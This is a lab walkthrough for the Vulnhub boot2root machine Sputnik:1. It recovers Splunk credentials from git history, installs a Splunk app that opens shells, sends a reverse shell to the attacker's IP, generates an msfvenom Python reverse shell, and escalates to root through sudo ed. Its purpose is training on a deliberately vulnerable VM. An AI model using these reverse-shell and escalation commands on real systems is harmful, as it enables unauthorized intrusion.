Today we will be solving a boot2root lab from Vulnhub called
Sputnick:1. This lab, like many others, is a good way to keep your penetration
testing skills sharp while getting some variety.
Level: Easy
Task: To find
flag.txt
Table of Content
Scanning
·
Open ports and Running services (Nmap)
Enumeration
·
Web Directory search
·
Credential harvesting
Exploitation
·
Splunk reverse and bind shell
·
Python reverse shell
·
Accessing shell
Privilege Escalation
·
Capture flag.txt
Scanning
We start by scanning the network for targets using Netdiscover
netdiscover
So we found target IP 192.168.1.103 and proceed by running a Nmap
scan for all its ports to see what we can find.
nmap -p-
-A 192.168.1.103
Enumeration
The scan shows us we have port 8089, 8191, 55555 and 61337 open.
Port 55555 has an associated IP address and a directory link for git
respository; we investigate it to see what we can find. We copy and paste it
into our browser.
We access the “Logs” directory and click on the “HEAD” file
within.
There is a link for a Git page, we go to the link and find Flappy.
Git clone is used to clone and download the file to our system for further
investigation.
Once the file in downloaded we explore its contents but nothing
stands out, so we access their logs.
git clone https://github.com/ameerpornillos/flappy
git log
We see that the command gave us the logs for our file and the
search starts. We focus on the commit’s and start searching through them.
Finally, we come across the highlighted commit and strike gold!
We use the “ls-tree” to get an indented listing of the file.
The screenshot shows a file named “secret”; we used the git show
command on it’s string to see what is reveals
git ls-tree
07fda135aae22fa7869b3de9e450ff7cacfbc717
git show f4385198ce1cab56e0b2a1c55e8863040045b085
Now what could this be? We recalled seeing a Splunk service
running on port 61337, we accessed it on our browser to find a login screen for
Splunk.
192.168.1.103:61337
EXPLOITATION (SPLUNK)
The information we got earlier from the previous screenshot are in
fact login credentials. The username is “sputnik” and the password is
“ameer_says_thank_you_and_god_job”, we enter these and are able to get into the
Splunk account.
We looked around for a while and then decided to upload a shell to
the account. On searching we found a way to weaponize splunk with reverse and
bind shell from https://github.com/TBGSecurity/splunk_shells
The .gz file from the link was saved on our system, we navigate to
the “App: Search & Reporting” option and click on “Search & Reporting”
Click on the “Install app from file” option.
Using the browse option, we find our shell, select it and upload
it.
Click on the “Restart Now” to restart the application.
We scroll down to find our shell file as shown below. Before we
can run, it we need to click on the “Permissions” option to change its
permissions.
Configuration files need to be added in order to run the shell
successfully, here we set permission to everyone and at the bottom we click on the “All apps”
radio button and save this change.
Now to execute the shell. We navigate to the search option in
Splunk and type in our command defining that we want a reverse shell of
standard type to talk to out attach machines IP on the listening port.
| revshell std 192.168.1.110 1234
Access Victim’s Shell
Netcat is running on our machine listening on port 1234 and see
shell talking back.
The “id” command was used to no avail so we decided to step it up
a notch.
nc -lvp 1234
We used Msfvenom to create a python payload.
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.110 lport=4444
R
The payload is uploaded through our existing Netcat session, all
that needed to be done was the payload to be pasted into the terminal and
executed.
nc -lvp 1234
A new Netcat session is started on the port (4444) that we defined
in our payload and we see the execution occur flawlessly.
Privilege Escalation
We run “id” command to see that our user is “splunk”.
Time privilege escalation. On the splunk prompt we first run the
“sudo -l” command and enter the password that we used earlier to log into
Splunk “ameer_says_thank_you_and_good_job” where we found splunk user can ed as
root.
So close to root! Now all we have to do is run the “sudo ed” command
and then the “!/bin/sh” command.
Type in “id” and there you go! We have root!
Id
Sudo -l
ameer_says_thank_you_and_good_job
sudo ed
!/bin/sh
Time to look for our flag.
We look in the root directory to find “flag.txt” and use “cat” to
open it. Hooray for us!
As always, we at Hacking Articles hope you enjoy this lab and
share it with your collogues. This lab has a great feature that gives you an
insight into exploiting Splunk. Overall the lab is easy and the level of
frustration it might induce is minimal.
Have fun and stay ethical.
0 comments:
Post a Comment